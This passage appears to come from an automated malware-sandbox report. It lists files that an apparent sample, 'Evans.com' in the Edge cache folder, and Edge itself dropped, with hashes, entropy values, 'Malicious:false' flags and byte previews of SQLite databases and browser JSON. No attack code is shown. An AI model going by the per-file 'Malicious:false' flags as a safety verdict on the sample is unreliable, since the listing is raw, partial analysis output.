                                                                                                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                                                    MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                                                    SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                                                    SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                                                    SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090726234171398
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:B368358F6E963E0B802A103CB02EA4B6
                                                                                                                                                                                                                                                                                                                                    SHA1:E892EF2580C9227766A87B9A9AE002B8D13C742D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
                                                                                                                                                                                                                                                                                                                                    SHA-512:1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):45915
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088049344660778
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:5MkbJrT8IeQc5d9I+9uvhDO6vP6OZ8DiYZdFtoFc9N2aPiCAoYGoup1Xl3jVzXrC:5Mk1rT8H19I06i98aPiRoYhu3VlXr4d
                                                                                                                                                                                                                                                                                                                                    MD5:0E9EBAEA9C40C67891AF3A0F6291BB79
                                                                                                                                                                                                                                                                                                                                    SHA1:F1B7FB737192508574F466D747280C6848D305AC
                                                                                                                                                                                                                                                                                                                                    SHA-256:AEFEC0CF81A0FF4358CA56F7B7A1FB21F2910D5746B162635F72073117FD8ED7
                                                                                                                                                                                                                                                                                                                                    SHA-512:FA659F96E675B9BBC99AEBE005726884FE1416370EBE84BF124989687FAE5071470F54A3FBFC6CD1640A4D13C95D8333725672770BAAF2901043C999FB4C0A95
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735634791"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44620
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096295301538788
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBowu2hDO6vP6OZ8vvC4LFaCcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEW6cchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:C8CD37398BFCD38D8157BF5E1190C8C0
                                                                                                                                                                                                                                                                                                                                    SHA1:BAE45FAE1EEA7B149590A8DE746C329B7A820992
                                                                                                                                                                                                                                                                                                                                    SHA-256:050B8FEFD5D645C2DD54977B197421584EF640D774E3350E298195EE6E7F64B2
                                                                                                                                                                                                                                                                                                                                    SHA-512:CAB2F5C96F9E28DF7CE2426FD97AA0B71AD2B0808BE5CCBC3DB7BF657387C0ACC8AB47604C7BAF4E4E2BD9A963151056742AA7B501DB85067B0237FCBEF39DF1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                    Size (bytes):44620
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096295301538788
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBowu2hDO6vP6OZ8vvC4LFaCcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEW6cchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                    MD5:C8CD37398BFCD38D8157BF5E1190C8C0
                                                                                                                                                                                                                                                                                                                                    SHA1:BAE45FAE1EEA7B149590A8DE746C329B7A820992
                                                                                                                                                                                                                                                                                                                                    SHA-256:050B8FEFD5D645C2DD54977B197421584EF640D774E3350E298195EE6E7F64B2
                                                                                                                                                                                                                                                                                                                                    SHA-512:CAB2F5C96F9E28DF7CE2426FD97AA0B71AD2B0808BE5CCBC3DB7BF657387C0ACC8AB47604C7BAF4E4E2BD9A963151056742AA7B501DB85067B0237FCBEF39DF1
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                                                    MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                                                    SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                                                    SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                                                    SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                                                    MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                                                    SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                                                    SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                                                    SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.43686791459095975
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:L3A0BoMqvLQr4VzjRQEMPkcmS6uBEm68FX+XqMYJZRy3/JX5Dg1HF:M0B8LtKEOkcm+E44qMaRy3/JX5DaH
                                                                                                                                                                                                                                                                                                                                    MD5:87FDDFEFC1CE05B906D34F29FBF36C0F
                                                                                                                                                                                                                                                                                                                                    SHA1:9D68F2C0EB7CF7F88A0C142BD128F3D4186E7BDD
                                                                                                                                                                                                                                                                                                                                    SHA-256:6BAA9CCF7627AFD91D8030AF1206090E66765976DC16E170A2909EC0B910F84A
                                                                                                                                                                                                                                                                                                                                    SHA-512:B03FD492C7F8F7CCD8C443A7C5D08ADDA7310B80B8E81C2A6491219F547914EF88BE144C68255EBC5D257C7614593D41C59ABEE5091876CE1D9E53584A738828
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................[..8[..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".vdeeps20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........~......
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                                                                    MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                                                                    SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                                                                    SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                                                                    SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (17597), with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):17603
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.491495768504114
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:stVPGKSu4SswffhluMfmSRbGJQwO6W9aTYX:sbOxutffmqbGap5aTYX
                                                                                                                                                                                                                                                                                                                                    MD5:42826A07DEB5DC71180C6A100AA762C4
                                                                                                                                                                                                                                                                                                                                    SHA1:DF3807BF8BAB28CE6FA535D4A43929761094E275
                                                                                                                                                                                                                                                                                                                                    SHA-256:5E70AB21D48FEBF04807C4BD84BDB1C0589904C3D2141C392B3CB7C338E3C16B
                                                                                                                                                                                                                                                                                                                                    SHA-512:3650714585CDE612B8F04BC2AE2292C5300B14AAE37A126FCC8046AC0B28B8394FD6E0462BB7F4D1C2A562FDAD174776FBE7D557B734A2486C7B728E305B8B24
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380108386242373","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
